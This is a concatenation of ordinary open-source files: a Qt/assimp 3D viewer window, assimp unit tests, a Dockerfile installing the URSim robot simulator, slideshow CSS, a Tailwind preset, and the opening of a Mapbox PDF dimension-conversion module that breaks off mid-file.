mGLView->Camera_Rotate(dy, dx, 0);// Rotate around oX and oY axises.
mGLView->updateGL();
mPosition_Pressed_RMB = pEvent->pos();
}
}
void MainWindow::keyPressEvent(QKeyEvent* pEvent)
{
GLfloat step;
if(pEvent->modifiers() & Qt::ControlModifier)
step = 10;
else if(pEvent->modifiers() & Qt::AltModifier)
step = 100;
else
step = 1;
if(pEvent->key() == Qt::Key_A)
mGLView->Camera_Translate(-step, 0, 0);
else if(pEvent->key() == Qt::Key_D)
mGLView->Camera_Translate(step, 0, 0);
else if(pEvent->key() == Qt::Key_W)
mGLView->Camera_Translate(0, step, 0);
else if(pEvent->key() == Qt::Key_S)
mGLView->Camera_Translate(0, -step, 0);
else if(pEvent->key() == Qt::Key_Up)
mGLView->Camera_Translate(0, 0, -step);
else if(pEvent->key() == Qt::Key_Down)
mGLView->Camera_Translate(0, 0, step);
mGLView->updateGL();
}
/********************************************************************/
/********************** Constructor/Destructor **********************/
/********************************************************************/
MainWindow::MainWindow(QWidget *parent)
: QMainWindow(parent), ui(new Ui::MainWindow),
mScene(nullptr)
{
using namespace Assimp;
ui->setupUi(this);
// Create OpenGL widget
mGLView = new CGLView(this);
mGLView->setMinimumSize(800, 600);
mGLView->setSizePolicy(QSizePolicy::Expanding, QSizePolicy::MinimumExpanding);
mGLView->setFocusPolicy(Qt::StrongFocus);
// Connect to GLView signals.
connect(mGLView, SIGNAL(Paint_Finished(size_t, GLfloat)), SLOT(Paint_Finished(size_t, GLfloat)));
connect(mGLView, SIGNAL(SceneObject_Camera(QString)), SLOT(SceneObject_Camera(QString)));
connect(mGLView, SIGNAL(SceneObject_LightSource(QString)), SLOT(SceneObject_LightSource(QString)));
// and add it to layout
ui->hlMainView->insertWidget(0, mGLView, 4);
// Create logger
mLoggerView = new CLoggerView(ui->tbLog);
DefaultLogger::create("", Logger::VERBOSE);
DefaultLogger::get()->attachStream(mLoggerView, DefaultLogger::Debugging | DefaultLogger::Info | DefaultLogger::Err | DefaultLogger::Warn);
}
MainWindow::~MainWindow()
{
using namespace Assimp;
DefaultLogger::get()->detatchStream(mLoggerView, DefaultLogger::Debugging | DefaultLogger::Info | DefaultLogger::Err | DefaultLogger::Warn);
DefaultLogger::kill();
if(mScene != nullptr) mImporter.FreeScene();
if(mLoggerView != nullptr) delete mLoggerView;
if(mGLView != nullptr) delete mGLView;
delete ui;
}
/********************************************************************/
/****************************** Slots *******************************/
/********************************************************************/
void MainWindow::Paint_Finished(const size_t pPaintTime_ms, const GLfloat pDistance)
{
ui->lblRenderTime->setText(QString("%1").arg(pPaintTime_ms));
ui->lblDistance->setText(QString("%1").arg(pDistance));
}
void MainWindow::SceneObject_Camera(const QString& pName)
{
ui->lstCamera->addItem(pName);
}
void MainWindow::SceneObject_LightSource(const QString& pName)
{
ui->lstLight->addItem(pName);
// After item added "currentRow" is still contain old value (even '-1' if first item added). Because "currentRow"/"currentItem" is changed by user interaction,
// not by "addItem". So, "currentRow" must be set manually.
ui->lstLight->setCurrentRow(ui->lstLight->count() - 1);
// And after "selectAll" handler of "signal itemSelectionChanged" will get right "currentItem" and "currentRow" values.
ui->lstLight->selectAll();
}
void MainWindow::on_butOpenFile_clicked()
{
aiString filter_temp;
QString filename, filter;
mImporter.GetExtensionList(filter_temp);
filter = filter_temp.C_Str();
filter.replace(';', ' ');
filter.append(" ;; All (*.*)");
filename = QFileDialog::getOpenFileName(this, "Choose the file", "", filter);
if(!filename.isEmpty()) ImportFile(filename);
}
void MainWindow::on_butExport_clicked()
{
using namespace Assimp;
QString filename, filter, format_id;
Exporter exporter;
QTime time_begin;
aiReturn rv;
if(mScene == nullptr)
{
QMessageBox::critical(this, "Export error", "Scene is empty");
return;
}
// build filter
{
aiString filter_temp;
mImporter.GetExtensionList(filter_temp);
filter = filter_temp.C_Str();
filter.replace(';', ' ');
}
// get file path
filename = QFileDialog::getSaveFileName(this, "Set file name", "", filter);
// extract format ID
format_id = filename.right(filename.length() - filename.lastIndexOf('.') - 1);
if(format_id.isEmpty())
{
QMessageBox::critical(this, "Export error", "File name must has extension.");
return;
}
// begin export
time_begin = QTime::currentTime();
rv = exporter.Export(mScene, format_id.toLocal8Bit(), filename.toLocal8Bit());
ui->lblExportTime->setText(QString("%1").arg(time_begin.secsTo(QTime::currentTime())));
if(rv == aiReturn_SUCCESS)
LogInfo("Export done: " + filename);
else
LogError("Export failed: " + filename);
}
void MainWindow::on_cbxLighting_clicked(bool pChecked)
{
if(pChecked)
mGLView->Lighting_Enable();
else
mGLView->Lighting_Disable();
mGLView->updateGL();
}
void MainWindow::on_lstLight_itemSelectionChanged()
{
bool selected = ui->lstLight->isItemSelected(ui->lstLight->currentItem());
if(selected)
mGLView->Lighting_EnableSource(ui->lstLight->currentRow());
else
mGLView->Lighting_DisableSource(ui->lstLight->currentRow());
mGLView->updateGL();
}
void MainWindow::on_lstCamera_clicked( const QModelIndex &)
{
mGLView->Camera_Set(ui->lstLight->currentRow());
mGLView->updateGL();
}
void MainWindow::on_cbxBBox_clicked(bool checked)
{
mGLView->Enable_SceneBBox(checked);
mGLView->updateGL();
}
void MainWindow::on_cbxTextures_clicked(bool checked)
{
mGLView->Enable_Textures(checked);
mGLView->updateGL();
}
<|start_filename|>assimp/test/unit/utFindInvalidData.cpp<|end_filename|>
/*
---------------------------------------------------------------------------
Open Asset Import Library (assimp)
---------------------------------------------------------------------------
Copyright (c) 2006-2016, assimp team
All rights reserved.
Redistribution and use of this software in source and binary forms,
with or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the
following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other
materials provided with the distribution.
* Neither the name of the assimp team, nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior
written permission of the assimp team.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
---------------------------------------------------------------------------
*/
#include "UnitTestPCH.h"
#include <FindInvalidDataProcess.h>
#include "../../include/assimp/mesh.h"
using namespace std;
using namespace Assimp;
class FindInvalidDataProcessTest : public ::testing::Test
{
public:
virtual void SetUp();
virtual void TearDown();
protected:
aiMesh* pcMesh;
FindInvalidDataProcess* piProcess;
};
// ------------------------------------------------------------------------------------------------
void FindInvalidDataProcessTest::SetUp()
{
ASSERT_TRUE( AI_MAX_NUMBER_OF_TEXTURECOORDS >= 3);
piProcess = new FindInvalidDataProcess();
pcMesh = new aiMesh();
pcMesh->mNumVertices = 1000;
pcMesh->mVertices = new aiVector3D[1000];
for (unsigned int i = 0; i < 1000;++i)
pcMesh->mVertices[i] = aiVector3D((float)i);
pcMesh->mNormals = new aiVector3D[1000];
for (unsigned int i = 0; i < 1000;++i)
pcMesh->mNormals[i] = aiVector3D((float)i+1);
pcMesh->mTangents = new aiVector3D[1000];
for (unsigned int i = 0; i < 1000;++i)
pcMesh->mTangents[i] = aiVector3D((float)i);
pcMesh->mBitangents = new aiVector3D[1000];
for (unsigned int i = 0; i < 1000;++i)
pcMesh->mBitangents[i] = aiVector3D((float)i);
for (unsigned int a = 0; a < AI_MAX_NUMBER_OF_TEXTURECOORDS;++a)
{
pcMesh->mTextureCoords[a] = new aiVector3D[1000];
for (unsigned int i = 0; i < 1000;++i)
pcMesh->mTextureCoords[a][i] = aiVector3D((float)i);
}
}
// ------------------------------------------------------------------------------------------------
void FindInvalidDataProcessTest::TearDown()
{
delete piProcess;
delete pcMesh;
}
// ------------------------------------------------------------------------------------------------
TEST_F(FindInvalidDataProcessTest, testStepNegativeResult)
{
::memset(pcMesh->mNormals,0,pcMesh->mNumVertices*sizeof(aiVector3D));
::memset(pcMesh->mBitangents,0,pcMesh->mNumVertices*sizeof(aiVector3D));
pcMesh->mTextureCoords[2][455] = aiVector3D( std::numeric_limits<float>::quiet_NaN() );
piProcess->ProcessMesh(pcMesh);
EXPECT_TRUE(NULL != pcMesh->mVertices);
EXPECT_TRUE(NULL == pcMesh->mNormals);
EXPECT_TRUE(NULL == pcMesh->mTangents);
EXPECT_TRUE(NULL == pcMesh->mBitangents);
for (unsigned int i = 0; i < 2;++i)
EXPECT_TRUE(NULL != pcMesh->mTextureCoords[i]);
for (unsigned int i = 2; i < AI_MAX_NUMBER_OF_TEXTURECOORDS;++i)
EXPECT_TRUE(NULL == pcMesh->mTextureCoords[i]);
}
// ------------------------------------------------------------------------------------------------
TEST_F(FindInvalidDataProcessTest, testStepPositiveResult)
{
piProcess->ProcessMesh(pcMesh);
EXPECT_TRUE(NULL != pcMesh->mVertices);
EXPECT_TRUE(NULL != pcMesh->mNormals);
EXPECT_TRUE(NULL != pcMesh->mTangents);
EXPECT_TRUE(NULL != pcMesh->mBitangents);
for (unsigned int i = 0; i < AI_MAX_NUMBER_OF_TEXTURECOORDS;++i)
EXPECT_TRUE(NULL != pcMesh->mTextureCoords[i]);
}
<|start_filename|>assimp/test/unit/utIOStreamBuffer.cpp<|end_filename|>
/*
---------------------------------------------------------------------------
Open Asset Import Library (assimp)
---------------------------------------------------------------------------
Copyright (c) 2006-2016, assimp team
All rights reserved.
Redistribution and use of this software in source and binary forms,
with or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the
following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other
materials provided with the distribution.
* Neither the name of the assimp team, nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior
written permission of the assimp team.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
---------------------------------------------------------------------------
*/
#include "UnitTestPCH.h"
#include "IOStreamBuffer.h"
#include "TestIOStream.h"
class IOStreamBufferTest : public ::testing::Test {
// empty
};
using namespace Assimp;
TEST_F( IOStreamBufferTest, creationTest ) {
bool ok( true );
try {
IOStreamBuffer<char> myBuffer;
} catch ( ... ) {
ok = false;
}
EXPECT_TRUE( ok );
}
TEST_F( IOStreamBufferTest, accessCacheSizeTest ) {
IOStreamBuffer<char> myBuffer1;
EXPECT_NE( 0U, myBuffer1.cacheSize() );
IOStreamBuffer<char> myBuffer2( 100 );
EXPECT_EQ( 100U, myBuffer2.cacheSize() );
}
TEST_F( IOStreamBufferTest, open_close_Test ) {
IOStreamBuffer<char> myBuffer;
EXPECT_FALSE( myBuffer.open( nullptr ) );
EXPECT_FALSE( myBuffer.close() );
char buffer[ L_tmpnam ];
tmpnam( buffer );
std::FILE *fs( std::fopen( buffer, "w+" ) );
size_t written( std::fwrite( buffer, 1, sizeof( char ) * L_tmpnam, fs ) );
EXPECT_NE( 0U, written );
std::fflush( fs );
TestDefaultIOStream myStream( fs, buffer );
EXPECT_TRUE( myBuffer.open( &myStream ) );
EXPECT_FALSE( myBuffer.open( &myStream ) );
EXPECT_TRUE( myBuffer.close() );
}
TEST_F( IOStreamBufferTest, readlineTest ) {
char buffer[ L_tmpnam ];
tmpnam( buffer );
std::FILE *fs( std::fopen( buffer, "w+" ) );
size_t written( std::fwrite( buffer, 1, sizeof( char ) * L_tmpnam, fs ) );
EXPECT_NE( 0U, written );
std::fflush( fs );
IOStreamBuffer<char> myBuffer( 26 );
EXPECT_EQ( 26U, myBuffer.cacheSize() );
TestDefaultIOStream myStream( fs, buffer );
size_t size( myStream.FileSize() );
size_t numBlocks( size / myBuffer.cacheSize() );
if ( size % myBuffer.cacheSize() > 0 ) {
numBlocks++;
}
EXPECT_TRUE( myBuffer.open( &myStream ) );
EXPECT_EQ( numBlocks, myBuffer.getNumBlocks() );
EXPECT_TRUE( myBuffer.close() );
}
TEST_F( IOStreamBufferTest, accessBlockIndexTest ) {
}
<|start_filename|>assimp/test/unit/utBlendImportAreaLight.cpp<|end_filename|>
/*
---------------------------------------------------------------------------
Open Asset Import Library (assimp)
---------------------------------------------------------------------------
Copyright (c) 2006-2016, assimp team
All rights reserved.
Redistribution and use of this software in source and binary forms,
with or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the
following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other
materials provided with the distribution.
* Neither the name of the assimp team, nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior
written permission of the assimp team.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
---------------------------------------------------------------------------
*/
#include "UnitTestPCH.h"
#include <assimp/cexport.h>
#include <assimp/Exporter.hpp>
#include <assimp/Importer.hpp>
#include <assimp/scene.h>
class BlendImportAreaLight : public ::testing::Test {
public:
virtual void SetUp()
{
im = new Assimp::Importer();
}
virtual void TearDown()
{
delete im;
}
protected:
Assimp::Importer* im;
};
// ------------------------------------------------------------------------------------------------
TEST_F(BlendImportAreaLight, testImportLight)
{
const aiScene* pTest = im->ReadFile(ASSIMP_TEST_MODELS_DIR "/BLEND/AreaLight_269.blend",0);
ASSERT_TRUE(pTest != NULL);
ASSERT_TRUE(pTest->HasLights());
std::vector< std::pair<std::string, size_t> > lightNames;
for (size_t i = 0; i < pTest->mNumLights; i++) {
lightNames.push_back(std::make_pair(pTest->mLights[i]->mName.C_Str(), i));
}
std::sort(lightNames.begin(), lightNames.end());
std::vector<aiLight> lights;
for (size_t i = 0; i < pTest->mNumLights; ++i) {
lights.push_back(*pTest->mLights[lightNames[i].second]);
}
ASSERT_STREQ(lights[0].mName.C_Str(), "Bar");
ASSERT_STREQ(lights[1].mName.C_Str(), "Baz");
ASSERT_STREQ(lights[2].mName.C_Str(), "Foo");
ASSERT_EQ(lights[0].mType, aiLightSource_AREA);
ASSERT_EQ(lights[1].mType, aiLightSource_POINT);
ASSERT_EQ(lights[2].mType, aiLightSource_AREA);
EXPECT_FLOAT_EQ(lights[0].mSize.x, 0.5f);
EXPECT_FLOAT_EQ(lights[0].mSize.y, 2.0f);
EXPECT_FLOAT_EQ(lights[2].mSize.x, 1.0f);
EXPECT_FLOAT_EQ(lights[2].mSize.y, 1.0f);
EXPECT_FLOAT_EQ(lights[0].mColorDiffuse.r, 42.0f);
EXPECT_FLOAT_EQ(lights[0].mColorDiffuse.g, 42.0f);
EXPECT_FLOAT_EQ(lights[0].mColorDiffuse.b, 42.0f);
EXPECT_FLOAT_EQ(lights[2].mColorDiffuse.r, 1.0f);
EXPECT_FLOAT_EQ(lights[2].mColorDiffuse.g, 1.0f);
EXPECT_FLOAT_EQ(lights[2].mColorDiffuse.b, 1.0f);
EXPECT_FLOAT_EQ(lights[0].mDirection.x, 0.0f);
EXPECT_FLOAT_EQ(lights[0].mDirection.y, 0.0f);
EXPECT_FLOAT_EQ(lights[0].mDirection.z, -1.0f);
EXPECT_FLOAT_EQ(lights[2].mDirection.x, 0.0f);
EXPECT_FLOAT_EQ(lights[2].mDirection.y, 0.0f);
EXPECT_FLOAT_EQ(lights[2].mDirection.z, -1.0f);
}
| forifelse/fispTools |
<|start_filename|>ur_robot_driver/resources/ursim_driver/ursim/g5/Dockerfile<|end_filename|>
# MIT License
#
# Original from https://github.com/ahobsonsayers/DockURSim
# Copyright (c) 2019 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
FROM ubuntu:latest
# Set Version Information
ARG VERSION
ARG URSIM
LABEL build_version="URSim Version: ${VERSION}"
LABEL description="UR simulator e-series"
# Set Timezone
ENV TZ "Europe/Copenhagen"
# Set Home Directory
ENV HOME /ursim
# Set robot model - Can be UR3, UR5 or UR10
ENV ROBOT_MODEL UR5
# Set display
ENV DISPLAY :1
RUN \
echo "**** Installing Dependencies ****" && \
apt-get update && \
apt-get install -qy --no-install-recommends openjdk-8-jre psmisc && \
apt-get -y install curl && \
apt-get install -y x11vnc xvfb && \
# Change java alternatives so we use openjdk8 (required by URSim)
update-alternatives --install /usr/bin/java java /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java 10000
# Setup JAVA_HOME
ENV JAVA_HOME /usr/lib/jvm/java-8-openjdk-amd64
RUN \
echo "**** Downloading URSim ****" && \
# Download URSim Linux tar.gz
curl ${URSIM} -o URSim-Linux.tar.gz && \
# Extract tarball
tar xvzf URSim-Linux.tar.gz && \
# Remove the tarball
rm URSim-Linux.tar.gz && \
# Rename the URSim folder to just ursim
mv /ursim* /ursim
RUN \
echo "**** Installing URSim ****" && \
# cd to ursim folder
cd /ursim && \
# Stop install of unnecessary packages and install required ones quietly
sed -i 's|apt-get -y install|apt-get -qy install --no-install-recommends|g' ./install.sh && \
# Skip xterm command. We don't have a desktop
sed -i 's|tty -s|(exit 0)|g' install.sh && \
# Skip Check of Java Version as we have the correct installed and the command will fail
sed -i 's|needToInstallJava$|(exit 0)|g' install.sh && \
# Skip install of desktop shortcuts - we don't have a desktop
sed -i '/for TYPE in UR3 UR5 UR10/,$ d' ./install.sh && \
# Replace libcurl3 with libcurl4 else the installation will fail
sed -i 's/libcurl3/libcurl4/g' ./install.sh && \
# Remove commands that are not relevant on docker as we are root user
sed -i 's|pkexec ||g' ./install.sh && \
sed -i 's|sudo ||g' ./install.sh && \
sed -i 's|sudo ||g' ./ursim-certificate-check.sh && \
#
# Install URSim
./install.sh && \
#
echo "Installed URSim"
ENV PATH "$PATH:/ursim/usr/bin"
RUN \
echo "**** Clean Up ****" && \
rm -rf \
/tmp/* \
/var/lib/apt/lists/* \
/var/tmp/*
# Copy entrypoint script
COPY g5/entrypoint.sh /entrypoint.sh
RUN chmod +x /entrypoint.sh
# VNC viewer
EXPOSE 5900
# Modbus Port
EXPOSE 502
# Interface Ports
EXPOSE 29999
EXPOSE 30001-30004
# Install the ExternalControl URCap
ADD ./aux/externalcontrol-1.0.5.urcap /ursim/GUI/bundle/com.fzi.externalcontrol-1.0.5.jar
# This will start the simulator
ENTRYPOINT ["/entrypoint.sh"]
| shonigmann/Universal_Robots_ROS2_Driver |
<|start_filename|>bower_components/slick/examples/css/style.css<|end_filename|>
.slick {
width: 500px;
position: relative;
background: #0F0F0F;
font-family: Calibri, Candara, Arial, sans-serif;
box-shadow: 0px 0px 2px 2px #aaa; }
.slick .slick-content {
width: inherit;
text-align: center; }
.slick .slick-content img {
width: inherit; }
.slick .slick-bottom {
height: 30px;
width: inherit;
color: #DDD;
background: #0F0F0F;
line-height: 21px; }
.slick .slick-bottom .slick-controls {
padding-top: 5px; }
.slick .slick-bottom .slick-controls img {
width: 20px;
margin-left: 5px;
opacity: 0.7;
-webkit-transition: opacity 0.2s ease-in-out;
-moz-transition: opacity 0.2s ease-in-out;
-ms-transition: opacity 0.2s ease-in-out;
-o-transition: opacity 0.2s ease-in-out;
transition: opacity 0.2s ease-in-out; }
.slick .slick-bottom .slick-controls img:hover {
opacity: 1;
-webkit-transition: opacity 0.2s ease-in-out;
-moz-transition: opacity 0.2s ease-in-out;
-ms-transition: opacity 0.2s ease-in-out;
-o-transition: opacity 0.2s ease-in-out;
transition: opacity 0.2s ease-in-out; }
.slick .slick-bottom .slick-no {
float: right;
padding-right: 10px;
position: relative;
padding-top: 5px; }
.slick .slick-bottom .slick-no .skip {
width: 16px;
text-align: right;
height: 20px;
margin-right: 3px;
padding: 1px 2px 0px 0px;
border: 1px solid #666;
background: #1E1E1E;
color: #DDD;
position: absolute;
left: -20px;
top: 5px;
-webkit-transition: all 0.2s ease-in-out;
-moz-transition: all 0.2s ease-in-out;
-ms-transition: all 0.2s ease-in-out;
-o-transition: all 0.2s ease-in-out;
transition: all 0.2s ease-in-out; }
.slick .slick-bottom .slick-no .skip:hover, .slick .slick-bottom .slick-no .skip:active, .slick .slick-bottom .slick-no .skip:focus {
background: #DDD;
color: black;
outline: none;
-webkit-transition: all 0.2s ease-in-out;
-moz-transition: all 0.2s ease-in-out;
-ms-transition: all 0.2s ease-in-out;
-o-transition: all 0.2s ease-in-out;
transition: all 0.2s ease-in-out; }
.slick .slick-bottom .slick-no .fullscr {
padding-left: 10px;
width: 20px;
cursor: pointer;
opacity: 0.7;
-webkit-transition: opacity 0.2s ease-in-out;
-moz-transition: opacity 0.2s ease-in-out;
-ms-transition: opacity 0.2s ease-in-out;
-o-transition: opacity 0.2s ease-in-out;
transition: opacity 0.2s ease-in-out; }
.slick .slick-bottom .slick-no .fullscr:hover {
opacity: 1;
-webkit-transition: opacity 0.2s ease-in-out;
-moz-transition: opacity 0.2s ease-in-out;
-ms-transition: opacity 0.2s ease-in-out;
-o-transition: opacity 0.2s ease-in-out;
transition: opacity 0.2s ease-in-out; }
.slick .slick-bottom .slick-no div {
float: left;
font-size: 0.9em; }
.slick .slick-bottom .slick-no div:nth-child(1) span {
padding-left: 3px; }
.slick .length {
height: 1px;
width: 37%;
background: #7F8C8D; }
.slick .overlay-controls .overlay-next {
height: calc(100% - 35px);
width: 50%;
display: block;
position: absolute;
top: 0;
right: 0; }
.slick .overlay-controls .overlay-prev {
height: calc(100% - 35px);
width: 50%;
display: block;
position: absolute;
top: 0;
left: 0; }
.fullscreen {
width: initial;
border: none;
box-shadow: none; }
.fullscreen .slick-content {
width: initial;
height: calc(100% - 35px); }
.fullscreen .slick-content img {
width: initial;
height: 100%; }
.fullscreen .length {
height: 2px; }
| srerrereal/rafa0elreal |
<|start_filename|>resources/stubs/tailwindcss/2.0/tall-forms-preset.js<|end_filename|>
const defaultTheme = require('tailwindcss/defaultTheme');
module.exports = {
purge: {
content: [
'./app/**/*.php',
//if Jetstream
'./vendor/laravel/jetstream/**/*.blade.php',
//if Jetstream and Breeze
'./vendor/laravel/framework/src/Illuminate/Pagination/resources/views/*.blade.php',
'./storage/framework/views/*.php',
// Tall-forms
'./config/tall-forms.php',
'./vendor/tanthammar/tall-forms/**/*.php',
'./vendor/tanthammar/tall-forms-sponsors/**/*.php',
// File formats applicable to most projects
'./resources/**/*.html',
'./resources/**/*.js',
'./resources/**/*.jsx',
'./resources/**/*.ts',
'./resources/**/*.tsx',
'./resources/**/*.php',
'./resources/**/*.vue',
'./resources/**/*.twig',
],
options: {
defaultExtractor: (content) => content.match(/[^<>"'`\s]*[^<>"'`\s:]/g) || [],
safeList: [/-active$/, /-enter$/, /-leave-to$/, /show$/],
},
},
theme: {
extend: {
fontFamily: {
sans: ['Nunito', ...defaultTheme.fontFamily.sans],
},
colors: {
//missing TWv1x colors
teal: {
100: '#e6fffa',
200: '#b2f5ea',
300: '#81e6d9',
400: '#4fd1c5',
500: '#38b2ac',
DEFAULT: '#38b2ac',
600: '#319795',
700: '#2c7a7b',
800: '#285e61',
900: '#234e52',
},
},
},
},
variants: {
extend: {
opacity: ['responsive', 'hover', 'focus', 'disabled'],
},
},
plugins: [
require('@tailwindcss/typography'),
require('@tailwindcss/forms'),
require('@tailwindcss/aspect-ratio'),
],
};
| ziming/tall-forms |
<|start_filename|>js/dimensions.js<|end_filename|>
/*
* Mapbox Print Pdf - Printing PDFs with high resolution mapbox maps
* Copyright (c) 2018 <NAME>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
var check = require('./type-check.js');
var UNITS = {
Points: 'pt',
Pixels: 'px',
Inches: 'in',
Millimeters: 'mm',
Centimeters: 'cm'
};
UNITS.Enumerated = [UNITS.Points, UNITS.Pixels, UNITS.Inches, UNITS.Millimeters, UNITS.Centimeters];
function isValidPDFUnit(value) {
return check.isString(value) && value !== UNITS.Pixels && UNITS.Enumerated.indexOf(value) !== -1;
}
var Dimens = (function () {
var IN_TO_CM = 2.54;
var IN_TO_MM = 10 * IN_TO_CM;
var IN_TO_PT = 72;
var IN_TO_PX = 96;
var _toInches = function (value, unit) {
if (unit === UNITS.Inches) return value;
if (unit === UNITS.Centimeters) return value / IN_TO_CM;
if (unit === UNITS.Millimeters) return value / IN_TO_MM;
if (unit === UNITS.Points) return value / IN_TO_PT;
if (unit === UNITS.Pixels) return value / IN_TO_PX;
console.error('Unrecognized unit: ' + unit);
return -1;
};
var _isValidDimensionObject = function (obj) {
if (!check.isObject(obj)) return false;
if (!obj.hasOwnProperty('width') || !obj.hasOwnProperty('height') || !obj.hasOwnProperty('unit')) return false;
if (!check.isNumber(obj.width) || !check.isNumber(obj.height) || !check.isString(obj.unit)) return false;
if (obj.width < 0 || obj.height < 0 || UNITS.Enumerated.indexOf(obj.unit) == -1) return false;
return true;
};
var _isValidPdfDimensionObject = function (obj) {
if (!_isValidDimensionObject(obj) || !isValidPDFUnit(obj.unit)) return false;
return true;
};
var _toDimension = function (obj) {
if (obj instanceof Dimens) return obj;
if (!_isValidDimensionObject(obj)) return null;
return new Dimens(obj.width, obj.height, obj.unit);
};
var _add = function (dimensOne, dimensTwo) {
dimensTwo = dimensTwo.to(dimensOne.unit());
return new Dimens(dimensOne.width() + dimensTwo.width(),
dimensOne.height() + dimensTwo.height(), dimensOne.unit());
};
var _toPdfDimension = function (obj) {
if (!_isValidPdfDimensionObject) return null;
if (obj instanceof Dimens) return obj;
return new Dimens(obj.width, obj.height, obj.unit);
};
var _subtractMargin = function (dimensions, margins) {
